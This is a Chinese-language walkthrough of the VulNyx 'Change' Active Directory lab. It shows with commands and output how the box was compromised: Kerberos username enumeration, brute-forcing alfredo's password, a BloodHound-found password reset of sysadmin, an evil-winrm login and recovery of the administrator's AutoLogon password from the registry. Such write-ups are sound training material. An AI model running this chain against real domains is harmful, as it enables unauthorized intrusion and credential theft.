VulNyx Change Walkthrough

靶场:VulNyx
地址:https://vulnyx.com/file/Change.php
系统:Windows
内容:AD基本操作

端口扫描情况如下。

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-15 00:41:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:45:42:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-15T00:42:09
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 15h59m56s
| nbstat: NetBIOS name: CHANGE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:45:42:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   CHANGE<00>           Flags: <unique><active>
|   MEGACHANGE<00>       Flags: <group><active>
|   MEGACHANGE<1c>       Flags: <group><active>
|   CHANGE<20>           Flags: <unique><active>
|_  MEGACHANGE<1b>       Flags: <unique><active>

查看一下AD基本信息,将CHANGE.megachange.nyx和megachange.nyx加入hosts。

~/D/c $ldapsearch -x -H ldap://$IP -s base
rootDomainNamingContext: DC=megachange,DC=nyx
ldapServiceName: megachange.nyx:change$@MEGACHANGE.NYX
...
dsServiceName: CN=NTDS Settings,CN=CHANGE,CN=Servers,CN=Default-First-Site-Nam
 e,CN=Sites,CN=Configuration,DC=megachange,DC=nyx
dnsHostName: CHANGE.megachange.nyx
defaultNamingContext: DC=megachange,DC=nyx
...

由于没有其它信息可用,smb空账号枚举也没有任何发现,下面看能否爆出一些用户名。

~/D/c $kerbrute_linux_amd64 userenum -d megachange.nyx --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/15/25 - Ronnie Flathers @ropnop

2025/03/15 03:40:34 >  Using KDC(s):
2025/03/15 03:40:34 >   192.168.56.10:88

2025/03/15 03:40:41 >  [+] VALID USERNAME:       alfredo@megachange.nyx
2025/03/15 03:40:43 >  [+] VALID USERNAME:       administrator@megachange.nyx
2025/03/15 03:40:47 >  [+] VALID USERNAME:       change@megachange.nyx
2025/03/15 03:41:44 >  [+] VALID USERNAME:       Administrator@megachange.nyx
2025/03/15 03:41:58 >  [+] VALID USERNAME:       Alfredo@megachange.nyx
2025/03/15 03:41:58 >  [+] VALID USERNAME:       sysadmin@megachange.nyx
2025/03/15 03:43:07 >  [+] VALID USERNAME:       Change@megachange.nyx
...

管理员的密码就不要想爆破出来了,只有alfredo用户的密码值得尝试爆破一下。

~/D/c $crackmapexec smb $IP -u alfredo -p /usr/share/wordlists/rockyou.txt | grep -v STATUS_LOGON_FAILURE
SMB                      192.168.56.10   445    CHANGE           [*] Windows 10 / Server 
SMB                      192.168.56.10   445    CHANGE           [+] megachange.nyx\alfredo:Password1

查看一下alfredo的权限,可以登录smb和ldap。

~/D/c $/opt/check_auth.sh -u alfredo -p Password1  $IP
Running: netexec smb 192.168.56.10 -u alfredo -p Password1
SMB                      192.168.56.10   445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB                      192.168.56.10   445    CHANGE           [+] megachange.nyx\alfredo:Password1
----------------------------------------
Running: netexec winrm 192.168.56.10 -u alfredo -p Password1
WINRM                    192.168.56.10   5985   CHANGE           [*] Windows 10 / Server 2019 Build 17763 (name:CHANGE) (domain:megachange.nyx)
WINRM                    192.168.56.10   5985   CHANGE           [-] megachange.nyx\alfredo:Password1
----------------------------------------
Running: netexec ldap 192.168.56.10 -u alfredo -p Password1
SMB                      192.168.56.10   445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
LDAP                     192.168.56.10   389    CHANGE           [+] megachange.nyx\alfredo:Password1
----------------------------------------

查看一下域用户,其实也就是刚才爆出的那几个。

~/D/c $rpcclient -U  "alfredo%Password1" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[alfredo] rid:[0x44f]
user:[sysadmin] rid:[0x450]

收集bloodhound信息。

~/D/c $netexec ldap $IP -u alfredo -p Password1  --bloodhound --collection All --dns-server $IP
SMB         192.168.56.10   445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
LDAP        192.168.56.10   389    CHANGE           [+] megachange.nyx\alfredo:Password1
LDAP        192.168.56.10   389    CHANGE           Resolved collection methods: objectprops, psremote, localadmin, container, rdp, dcom, group, acl, trusts, session
LDAP        192.168.56.10   389    CHANGE           Done in 00M 01S
LDAP        192.168.56.10   389    CHANGE           Compressing output into /home/kali/.nxc/logs/CHANGE_192.168.56.10_2025-03-15_044954_bloodhound.zip

可以看到alfredo可以更改sysadmin用户的密码。

修改sysadmin的密码。

~/D/c $mv ~/.nxc/logs/CHANGE_192.168.56.10_2025-03-15_044954_bloodhound.zip ./

~/D/c $net rpc password "sysadmin" "Password2" -U megachange.nyx/alfredo%Password1 -S change.megachange.nyx

~/D/c $netexec winrm $IP -u sysadmin -p Password2
WINRM       192.168.56.10   5985   CHANGE           [*] Windows 10 / Server 2019 Build 17763 (name:CHANGE) (domain:megachange.nyx)
WINRM       192.168.56.10   5985   CHANGE           [+] megachange.nyx\sysadmin:Password2 (Pwn3d!)

evil-winrm登录,上传winPEAS,搜索敏感信息。

~/D/c $evil-winrm -i $IP -u sysadmin -p Password2
...
*Evil-WinRM* PS C:\Users\sysadmin\Documents> upload winPEASx64.exe

Info: Uploading /home/kali/Documents/change/winPEASx64.exe to C:\Users\sysadmin\Documents\winPEASx64.exe

Data: 13122900 bytes of 13122900 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\sysadmin\Documents> .\winPEASx64.exe > out.log

然后发现了admin的密码。

������������ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  MEGACHANGE
    DefaultUserName               :  administrator
    DefaultPassword               :  d0m@in_c0ntr0ll3r

该信息其实是保存在注册表中的。

*Evil-WinRM* PS C:\Users\sysadmin\Documents> Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

AutoRestartShell             : 1
Background                   : 0 0 0
CachedLogonsCount            : 10
DebugServerCommand           : no
DefaultDomainName            : MEGACHANGE
DefaultUserName              : administrator
DisableBackButton            : 1
EnableSIHostIntegration      : 1
ForceUnlockLogon             : 0
LegalNoticeCaption           :
LegalNoticeText              :
PasswordExpiryWarning        : 5
PowerdownAfterShutdown       : 0
PreCreateKnownFolders        : {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk                 : 1
Shell                        : explorer.exe
ShellCritical                : 0
ShellInfrastructure          : sihost.exe
SiHostCritical               : 0
SiHostReadyTimeOut           : 0
SiHostRestartCountLimit      : 0
SiHostRestartTimeGap         : 0
Userinit                     : C:\Windows\system32\userinit.exe,
VMApplet                     : SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled          : 0
ShellAppRuntime              : ShellAppRuntime.exe
scremoveoption               : 0
DisableCAD                   : 1
LastLogOffEndTimePerfCounter : 12624879505
ShutdownFlags                : 2147483687
DisableLockWorkstation       : 0
DefaultPassword              : d0m@in_c0ntr0ll3r
AutoAdminLogon               : 0
AutoLogonSID                 : S-1-5-21-604841344-1972660676-6905362-500
LastUsedUsername             : administrator
PSPath                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PSParentPath                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName                  : Winlogon
PSDrive                      : HKLM
PSProvider                   : Microsoft.PowerShell.Core\Registry

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注